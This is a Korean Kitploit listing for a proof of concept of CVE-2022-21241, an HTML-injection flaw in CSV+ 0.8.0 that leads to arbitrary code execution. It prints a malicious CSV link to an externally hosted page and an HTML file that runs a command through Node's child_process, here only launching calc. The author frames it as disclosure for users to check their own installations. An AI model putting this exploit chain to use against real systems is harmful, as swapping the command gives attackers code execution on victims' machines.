Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
csv-plus_vulnerability — 👻 [PoC] CSV+ 0.8.0 - 임의 코드 실행 (CVE-2022-21241) | Kitploit
도구/GitHubGitHub/nanaao/csv-plus_vulnerability
Payload GenerationVulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationLearning & Education
GitHubnanaao/csv-plus_vulnerability

csv-plus_vulnerability

👻 [PoC] CSV+ 0.8.0 - 임의 코드 실행 (CVE-2022-21241)

저장소 보기
5544년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

csv-plus_vulnerability

👻 2-클릭 임의 코드 실행 취약점.

PoC.gif

CVE-2022-21241

⚠
이 PoC는 사용자에게 경고하고 자신의 CSV+에서 취약점을 조사하기 위해 만들어졌으며, 공격에 사용되는 것을 금지합니다.

취약점

다음 버전이 취약합니다.

  • CSV+ <= 0.8.0

공격자는 Node.js 기능을 사용하여 임의 코드를 실행할 수 있습니다. 그들은 악성 js 코드를 어떤 사이트에 배치하고 CSV+의 HTML 주입 취약점을 통해 a-태그에서 링크할 것입니다.

PoC

scenario.png

악성 csv 파일

<a href='https://electronooooo.htmlbin.net/xsscalc.html'>click me 👻</a>

https://electronooooo.htmlbin.net/xsscalc.html는 임시 링크입니다.

악성 HTML 파일 (calc)

<!DOCTYPE html>
<html>
    <head>
        <script>
            var cmd = "calc";
            require("child_process").exec(cmd);
        </script>
    </head>
    <body>
        Hi :)
    </body>
</html>
도구 다운로드